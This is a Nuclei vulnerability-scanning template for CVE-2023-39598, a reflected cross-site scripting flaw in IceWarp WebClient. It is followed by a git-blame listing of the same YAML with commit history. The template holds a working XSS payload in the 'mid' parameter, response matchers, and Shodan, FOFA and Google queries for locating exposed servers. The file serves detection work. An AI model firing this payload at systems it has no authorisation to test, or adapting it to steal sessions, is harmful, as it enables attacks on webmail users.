nuclei-templates/http/cves/2023/CVE-2023-39598.yaml

id: CVE-2023-39598

info:
  name: IceWarp Email Client - Cross Site Scripting
  author: Imjust0
  severity: medium
  description: |
    Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  reference:
    - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39598
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
    - https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39598
    cwe-id: CWE-79
    epss-score: 0.05054
    epss-percentile: 0.92885
    cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: icewarp
    product: webclient
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp"
    fofa-query: title="icewarp"
    google-query: intitle:"icewarp"
  tags: cve2023,cve,xss,icewarp

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=x onerror=confirm(document.domain)>"
          - "icewarp"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b61cc4082f72e9770eabedfb6b301b7590959070f5bb1b6f14227b274ac82bc5022100c14f59d395c1494ad92a9ef23f1b51bb8547b853478e8dfbb4792b31ca0c0d2e:922c64590222798bb761d5b6d8e72950
minor update 2023-09-10 01:26:17 +00:00			`id: CVE-2023-39598`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`info:`
minor update 2023-09-10 01:26:17 +00:00			`name: IceWarp Email Client - Cross Site Scripting`
Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`author: Imjust0`
			`severity: medium`
minor update 2023-09-10 01:26:17 +00:00			`description: \|`
			`Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.`
Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`reference:`
minor update 2023-09-10 01:26:17 +00:00			`- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-39598`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598`
TemplateMan Update [Wed Nov 8 06:56:05 UTC 2023] :robot: 2023-11-08 06:56:05 +00:00			`- https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c`
templateman update 2023-10-14 11:27:55 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2023-39598`
			`cwe-id: CWE-79`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.05054`
			`epss-percentile: 0.92885`
templateman update 2023-10-14 11:27:55 +00:00			`cpe: cpe:2.3:a:icewarp:webclient:10.2.1:::::::*`
minor update 2023-09-10 01:26:17 +00:00			`metadata:`
Added Impact 2023-09-27 15:51:13 +00:00			`verified: "true"`
minor update 2023-09-10 01:26:17 +00:00			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`vendor: icewarp`
			`product: webclient`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"icewarp"`
			`- http.title:"icewarp"`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: title="icewarp"`
			`google-query: intitle:"icewarp"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,xss,icewarp`
minor update 2023-09-10 01:26:17 +00:00
Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`http:`
			`- method: GET`
			`path:`
minor update 2023-09-10 01:26:17 +00:00			`- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
minor update 2023-09-10 01:26:17 +00:00			`- "<img src=x onerror=confirm(document.domain)>"`
			`- "icewarp"`
			`condition: and`

matcher update 2023-09-10 14:34:42 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4b0a00483046022100b61cc4082f72e9770eabedfb6b301b7590959070f5bb1b6f14227b274ac82bc5022100c14f59d395c1494ad92a9ef23f1b51bb8547b853478e8dfbb4792b31ca0c0d2e:922c64590222798bb761d5b6d8e72950`